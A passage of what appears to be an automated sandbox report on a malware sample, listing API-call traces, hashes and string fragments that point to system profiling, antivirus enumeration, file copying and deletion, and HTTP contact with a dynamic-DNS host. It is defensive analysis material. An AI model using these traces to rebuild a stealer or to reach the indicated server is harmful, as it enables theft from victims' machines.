                                                                                                                                                                    • Instruction Fuzzy Hash: 2741C671D4021C7BDB14EB61EC47FDD7378AB09308F5044AAB605B7090EAB9AB888F59
                                                                                                                                                                    Function 0040ABE5 Relevance: 33.3, APIs: 22, Instructions: 315stringmemoryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
                                                                                                                                                                      • Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CopyFileA.KERNEL32(?,?,00000001), ref: 0040AC8A
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040AD94
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0040AD9B
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004373DC,00000000), ref: 0040AE4C
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,004373E0), ref: 0040AE74
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AE98
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373E4), ref: 0040AEA4
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AEAE
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373E8), ref: 0040AEBA
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AEC4
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373EC), ref: 0040AED0
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AEDA
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373F0), ref: 0040AEE6
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AEF0
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373F4), ref: 0040AEFC
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AF06
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373F8), ref: 0040AF12
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,?), ref: 0040AF1C
                                                                                                                                                                    • lstrcatA.KERNEL32(00000000,004373FC), ref: 0040AF28
                                                                                                                                                                    • lstrlenA.KERNEL32(00000000), ref: 0040AF7A
                                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0040AF95
                                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0040AFD8
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1956182324-0
                                                                                                                                                                    • Opcode ID: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                    • Instruction ID: ea3aaa4254ea011307d5ff1151e45a3af1a32ea2cb92a891b43a4b7d07102f87
                                                                                                                                                                    • Opcode Fuzzy Hash: bd24911d9c6cfefd4e37482eb3b4265b0e4e890a277d74ec42a85d9c1a9561a1
                                                                                                                                                                    • Instruction Fuzzy Hash: E6C15D32904208AFDF15EFA1ED4A9DD7B76EF04309F20102AF501B30A1DB7A6E959F95
                                                                                                                                                                    Function 00417041 Relevance: 29.0, APIs: 8, Strings: 8, Instructions: 1029networksleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                      • Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
                                                                                                                                                                      • Part of subcall function 00410C53: RtlAllocateHeap.NTDLL(00000000,?,?,?,004013B9), ref: 00410C66
                                                                                                                                                                      • Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A
                                                                                                                                                                      • Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
                                                                                                                                                                      • Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
                                                                                                                                                                      • Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650
                                                                                                                                                                      • Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0041858F), ref: 004170DD
                                                                                                                                                                    • OpenEventA.KERNEL32(001F0003,00000000,?,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004170EC
                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,004366DA), ref: 0041760A
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176CB
                                                                                                                                                                    • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004176E4
                                                                                                                                                                      • Part of subcall function 00404B2E: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
                                                                                                                                                                      • Part of subcall function 00404B2E: StrCmpCA.SHLWAPI(?), ref: 00404BEB
                                                                                                                                                                      • Part of subcall function 004139C2: StrCmpCA.SHLWAPI(?,block,?,?,00417744), ref: 004139D7
                                                                                                                                                                      • Part of subcall function 004139C2: ExitProcess.KERNEL32 ref: 004139E2
                                                                                                                                                                      • Part of subcall function 00405F39: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00405FD8
                                                                                                                                                                      • Part of subcall function 00405F39: StrCmpCA.SHLWAPI(?), ref: 00405FF6
                                                                                                                                                                      • Part of subcall function 00413198: strtok_s.MSVCRT ref: 004131B7
                                                                                                                                                                      • Part of subcall function 00413198: strtok_s.MSVCRT ref: 0041323A
                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00417A9A
                                                                                                                                                                      • Part of subcall function 00405F39: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040618E
                                                                                                                                                                      • Part of subcall function 00405F39: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 004061D2
                                                                                                                                                                      • Part of subcall function 00405F39: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406200
                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,0041858F), ref: 00417100
                                                                                                                                                                      • Part of subcall function 0041257F: __EH_prolog3_catch_GS.LIBCMT ref: 00412589
                                                                                                                                                                      • Part of subcall function 0041257F: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,0000013C,00417E31,.exe,00436CCC,00436CC8,00436CC4,00436CC0,00436CBC,00436CB8,00436CB4,00436CB0,00436CAC,00436CA8,00436CA4), ref: 004125A8
                                                                                                                                                                      • Part of subcall function 0041257F: Process32First.KERNEL32(00000000,00000128), ref: 004125B8
                                                                                                                                                                      • Part of subcall function 0041257F: Process32Next.KERNEL32(00000000,00000128), ref: 004125CA
                                                                                                                                                                      • Part of subcall function 0041257F: StrCmpCA.SHLWAPI(?), ref: 004125DC
                                                                                                                                                                      • Part of subcall function 0041257F: CloseHandle.KERNEL32(00000000), ref: 004125F0
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00418000
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InternetOpen$CloseCreateHandlelstrcpy$EventHeapProcessProcess32strtok_s$AllocateConnectDirectoryExitFirstH_prolog3_catch_HttpNameNextOptionRequestSleepSnapshotToolhelp32Userlstrcatlstrlen
                                                                                                                                                                    • String ID: .exe$.exe$_DEBUG.zip$bb7310eab4245006f125c442da2d1e50$cowod.$hopto$http://$org
                                                                                                                                                                    • API String ID: 2665860859-4208217514
                                                                                                                                                                    • Opcode ID: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                    • Instruction ID: 6931a3cdf0a24aa58a91b10b9e7b8ba7caee6cf73e2bca90393059e53503fd57
                                                                                                                                                                    • Opcode Fuzzy Hash: 7b25bb2eaa3a6cd7e0aea663192725cd6b06aabe44a9b574830072b1d532ec21
                                                                                                                                                                    • Instruction Fuzzy Hash: A89231715483419FC620FF26D94268EB7E1FF84308F51482FF58467191DBB8AA8D8B9B
                                                                                                                                                                    Function 004135A8 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 262stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • strtok_s.MSVCRT ref: 004135EA
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?,true), ref: 004136AC
                                                                                                                                                                      • Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
                                                                                                                                                                      • Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041376E
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041379F
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 004137DB
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00413817
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 00413853
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 0041388F
                                                                                                                                                                    • lstrcpyA.KERNEL32(?,00000000), ref: 004138CB
                                                                                                                                                                    • strtok_s.MSVCRT ref: 0041398F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                    • String ID: false$true
                                                                                                                                                                    • API String ID: 2116072422-2658103896
                                                                                                                                                                    • Opcode ID: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                    • Instruction ID: c59aadfba82ba9961634352731141a8533392cfc76d17a14f51357a5b51db833
                                                                                                                                                                    • Opcode Fuzzy Hash: a279cf5f2d9bb332d4ea2d779ea3926242373e75fc1a37c080be92b7bd300130
                                                                                                                                                                    • Instruction Fuzzy Hash: 5DB16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48
                                                                                                                                                                    Function 00405237 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 161networkmemoryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
                                                                                                                                                                      • Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
                                                                                                                                                                      • Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
                                                                                                                                                                      • Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E
                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040527E
                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00405285
                                                                                                                                                                    • InternetOpenA.WININET(?,00000000,00000000,00000000,00000000), ref: 004052A7
                                                                                                                                                                    • StrCmpCA.SHLWAPI(?), ref: 004052C1
                                                                                                                                                                    • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 004052F1
                                                                                                                                                                    • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00405330
                                                                                                                                                                    • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405360
                                                                                                                                                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040536B
                                                                                                                                                                    • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00405394
                                                                                                                                                                    • InternetReadFile.WININET(?,?,00000400,?), ref: 004053DA
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405439
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405445
                                                                                                                                                                    • InternetCloseHandle.WININET(?), ref: 00405451
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Internet$CloseHandleHttp$HeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                    • String ID: GET$\xA
                                                                                                                                                                    • API String ID: 442264750-571280152
                                                                                                                                                                    • Opcode ID: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                    • Instruction ID: d8c65d4c733feb9e18663b71d867c9ad77c8898020ac32f61dd77686cef25eee
                                                                                                                                                                    • Opcode Fuzzy Hash: e5d221f0112c41c2442819da8cf0992f09120ff3d4c743fde11cfb3d63f6140b
                                                                                                                                                                    • Instruction Fuzzy Hash: B75118B1900A28AFDF21DF64DC84BEFBBB9EB08346F0050E6E509A2290D6755F858F55
                                                                                                                                                                    Function 00411997 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 114comCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3_catch.LIBCMT ref: 0041199E
                                                                                                                                                                    • CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
                                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
                                                                                                                                                                    • CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
                                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 00411A5D
                                                                                                                                                                      • Part of subcall function 00411D42: LocalAlloc.KERNEL32(00000040,00000005,?,?,00411A80,?), ref: 00411D4A
                                                                                                                                                                      • Part of subcall function 00411D42: CharToOemW.USER32(?,00000000), ref: 00411D56
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 00411A8B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InitializeVariant$AllocBlanketCharClearCreateH_prolog3_catchInitInstanceLocalProxySecuritylstrcpy
                                                                                                                                                                    • String ID: Select * From AntiVirusProduct$Unknown$Unknown$Unknown$WQL$displayName$root\SecurityCenter2
                                                                                                                                                                    • API String ID: 4288110179-315474579
                                                                                                                                                                    • Opcode ID: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                    • Instruction ID: 57f5dd6b1c42f14037633b54d5227166f1307bde404719c4590db73b27f854ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 480d15d956828979c5f7302475284e9aad0b9c9fae78b991fe73a890f857e370
                                                                                                                                                                    • Instruction Fuzzy Hash: 6B314F70A44245BBCB20DB91DC49EEFBF7DEFC9B10F20561AF611A61A0C6B85941CB68
                                                                                                                                                                    Function 00401284 Relevance: 24.1, APIs: 16, Instructions: 120stringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _memset.LIBCMT ref: 004012A7
                                                                                                                                                                    • _memset.LIBCMT ref: 004012B6
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9EC), ref: 004012D0
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F0), ref: 004012DE
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F4), ref: 004012EC
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9F8), ref: 004012FA
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043A9FC), ref: 00401308
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA00), ref: 00401316
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA04), ref: 00401324
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA08), ref: 00401332
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA0C), ref: 00401340
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA10), ref: 0040134E
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA14), ref: 0040135C
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA18), ref: 0040136A
                                                                                                                                                                    • lstrcatA.KERNEL32(?,0043AA1C), ref: 00401378
                                                                                                                                                                      • Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
                                                                                                                                                                      • Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
                                                                                                                                                                      • Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC
                                                                                                                                                                    • ExitProcess.KERNEL32 ref: 004013E3
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000003.00000002.3371829647.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000003.00000002.3371829647.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_3_2_400000_aspnet_regiis.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcat$HeapProcess_memset$AllocComputerExitName
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1553874529-0
                                                                                                                                                                    • Opcode ID: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                    • Instruction ID: 239c304b61717195b0da288002eafcd0eca44a14d3e88ecdb176445cbc2bad3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e95ee71ea5f19c30ae725a6a9fe72d1a6a4a1b746d6da9d57ec7068e279e0e8
                                                                                                                                                                    • Instruction Fuzzy Hash: BD4196B2D4422C66DB20DB719C59FDB7BAC9F18310F5005A3A9D8F3181D67CDA84CB98
                                                                                                                                                                    Function 00411203 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 155registrystringCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D
                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
